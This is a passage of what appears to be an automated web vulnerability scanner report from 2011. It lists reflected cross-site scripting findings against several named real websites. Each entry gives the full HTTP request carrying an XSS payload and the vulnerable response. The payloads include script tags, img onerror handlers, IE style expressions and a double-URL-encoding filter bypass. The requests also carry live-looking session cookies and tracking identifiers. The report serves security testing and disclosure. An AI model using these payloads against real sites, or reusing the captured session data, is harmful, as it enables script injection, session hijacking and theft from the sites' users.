Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:15 GMT
Server: Apache/2.2
Content-Length: 608
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:43:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1&e8c85<a>b09e8ba8b09=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw22.
...[SNIP]...

6.49. http://mads.cnet.com/mac-ad [x-cb parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 10a82<a>eee095b3248 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=238253110a82<a>eee095b3248&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:09 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:39:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=238253110a82<a>eee095b3248&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLi
...[SNIP]...

6.50. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9894e'%3balert(1)//359739c617e was submitted in the admeld_callback parameter. This input was echoed as 9894e';alert(1)//359739c617e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9894e'%3balert(1)//359739c617e HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG4d4BVgEliy4Vfb1kUmDTmvAHSBkwWPSA+lwzHlc8sAowS68GyjBqvQbQBowWYzyXC8QooyyTxbNEPoCyDBoMBgwUDUHTFfFagnsl9p1FEd95nBorOmr8WIQoACHMrEg=="; io_freq_p1="eJzjEudY7yrAJLHlwq+3LAoMGgwGTBY9IDaXNMfxQAFmifVgCUaN1yDagNECzOcS5tgWKsAoMbnvNFQXgwUDUHCvC1Bw1vy1CEEAW5EfCA=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF42A3I5DZGAEkzuUAidMgwR27QIL/woHEdGMgf84PJiD57gAzkOzsYAYKT1QBMueChV/sZuZi4uDg4uLYuY9Z4NDBZe9YgAo2FgOl1n9gBJJPLoDIk2DFb3eDzDh0BMS+8B1EzgSLN/8HkU1AEmgvB5DY7wfkX9wLEl27nxEAzYguzQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 04 May 2011 01:29:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 04-May-2011 01:28:52 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 472

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9894e';alert(1)//359739c617e?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304904552&custom_user_segments=%2C11265%2C49026%2C49027%2C8%2C50185%2C4625%2C6551%2C48153%2C48156%2C48157%2C1
...[SNIP]...

6.51. http://tracking.moon-ray.com/track.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d5b1'%3balert(1)//b30dfeb8c85 was submitted in the t parameter. This input was echoed as 2d5b1';alert(1)//b30dfeb8c85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_72d5b1'%3balert(1)//b30dfeb8c85&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:15 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_72d5b1%27%3Balert%281%29%2F%2Fb30dfeb8c85; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 274

_mrd.cookie='ref_=mr_72d5b1';alert(1)//b30dfeb8c85;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617990;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_72d5b1';alert(1)//b30dfeb8c85;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

...[SNIP]...

6.52. http://www.autism-society.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autism-society.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56694"><img%20src%3da%20onerror%3dalert(1)>365080bc2dc was submitted in the REST URL parameter 1. This input was echoed as 56694"><img src=a onerror=alert(1)>365080bc2dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico56694"><img%20src%3da%20onerror%3dalert(1)>365080bc2dc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autism-society.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Set-Cookie: JSESSIONID=abcsge3bjBjolcVVbU4_s; path=/
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 01:56:04 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Wed, 04-May-2011 02:56:04 GMT;path=/;httponly
Content-Length: 21190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta n
...[SNIP]...
<a href="http://support.autism-society.org/site/UserLogin?NEXTURL=http://www.autism-society.org/favicon.ico56694"><img src=a onerror=alert(1)>365080bc2dc">
...[SNIP]...

6.53. http://www.bestbedguide.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bestbedguide.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cbdde%20style%3dx%3aexpression(alert(1))%2010f88a203a9 was submitted in the REST URL parameter 1. This input was echoed as cbdde style=x:expression(alert(1)) 10f88a203a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icocbdde%20style%3dx%3aexpression(alert(1))%2010f88a203a9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bestbedguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx
Date: Wed, 04 May 2011 01:35:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie
X-Frame-Options: DENY
Set-Cookie: sessionid=9850d59b0062c1181e3fc4cdf0a2b731; Path=/
Content-Length: 21124

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>

Error 404 - Not Found
- Best Bed Guide

</title><meta name="Description"
content="

Everything you n
...[SNIP]...
<input type="hidden" name="return" value=/favicon.icocbdde style=x:expression(alert(1)) 10f88a203a9>
...[SNIP]...

6.54. http://www.courts.info/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e519<script>alert(1)</script>6cdda82d440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e519<script>alert(1)</script>6cdda82d440 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:11 GMT
Expires: Tue, 03 May 2011 20:49:11 GMT
Content-Length: 727
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 51275<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
</strong> /FAVICON.ICO2E519<SCRIPT>ALERT(1)</SCRIPT>6CDDA82D440<BR>
...[SNIP]...

6.55. http://www.courts.info/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload edd1e<script>alert(1)</script>b3925b2fc14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?edd1e<script>alert(1)</script>b3925b2fc14=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:03 GMT
Expires: Tue, 03 May 2011 20:49:03 GMT
Content-Length: 726
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50741<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
</strong> EDD1E<SCRIPT>ALERT(1)</SCRIPT>B3925B2FC14 = 1<BR>
...[SNIP]...

6.56. http://www.craigslists.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d154%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef76299b78f6 was submitted in the REST URL parameter 1. This input was echoed as 6d154"><script>alert(1)</script>f76299b78f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /6d154%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef76299b78f6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash03
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 575

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED03 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/6d154"><script>alert(1)</script>f76299b78f6" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

6.57. http://www.craigslists.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff2e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f51871d241 was submitted in the REST URL parameter 1. This input was echoed as 5ff2e"><script>alert(1)</script>6f51871d241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico5ff2e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f51871d241 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 597

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED08 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico5ff2e"
...[SNIP]...
<a href="http://craigsolomon.net/favicon.ico5ff2e"><script>alert(1)</script>6f51871d241">
...[SNIP]...

6.58. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5642"><script>alert(1)</script>bc1710a9759 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f5642"><script>alert(1)</script>bc1710a9759=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash07
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 603

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED07 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico?f5642"><script>alert(1)</script>bc1710a9759=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

6.59. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60ae7"><script>alert(1)</script>3982eb966d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?60ae7"><script>alert(1)</script>3982eb966d3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 603

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED08 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico?60ae7
...[SNIP]...
<a href="http://craigsolomon.net/favicon.ico?60ae7"><script>alert(1)</script>3982eb966d3=1">
...[SNIP]...

6.60. http://www.electroluxappliances.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.electroluxappliances.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a35b'-alert(1)-'7fea7187e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3a35b'-alert(1)-'7fea7187e48 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.electroluxappliances.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16246
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Wed, 04 May 2011 03:08:10 GMT
Date: Wed, 04 May 2011 03:08:10 GMT
Connection: close
Set-Cookie: BIGipServerLive_Web2=234924224.20480.0000; path=/
Set-Cookie: ASP.NET_SessionId=kflu512k3sh4bm550qpncmql; path=/; HttpOnly
Set-Cookie: ss=1; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><base href="h
...[SNIP]...
<7)window.location.href=window.location.protocol+'//'+window.location.hostname+'/low'+window.location.pathname+'?aspxerrorpath=%2f3a35b'-alert(1)-'7fea7187e48.aspx' // -->
...[SNIP]...

6.61. http://www.flwoutdoors.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flwoutdoors.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b27c2<img%20src%3da%20onerror%3dalert(1)>f366bb33eee was submitted in the REST URL parameter 1. This input was echoed as b27c2<img src=a onerror=alert(1)>f366bb33eee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icob27c2<img%20src%3da%20onerror%3dalert(1)>f366bb33eee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flwoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8230f7e0fc8bd201af3a6b321d4141428612;path=/
Set-Cookie: JSESSIONID=8230f7e0fc8bd201af3a6b321d4141428612;domain=.flwoutdoors.com;path=/
Set-Cookie: PERSISTANCE=8230f7e0fc8bd201af3a6b321d4141428612%2ECOWEB02;domain=.flwoutdoors.com;path=/
Set-Cookie: USERCOOKIEID=05%5F03%5F2011%5F07%3A17%3A13;expires=Fri, 26-Apr-2041 01:17:13 GMT;path=/
Content-Length: 27104
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:15:41 GMT
Connection: keep-alive


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
   
   <html>
   <head>
       
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<span class="subhead">File not found: favicon.icob27c2<img src=a onerror=alert(1)>f366bb33eee </span>
...[SNIP]...

6.62. http://www.gemvara.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5c18a--><script>alert(1)</script>c2d42aa4496 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /5c18a--><script>alert(1)</script>c2d42aa4496 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gemvara.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

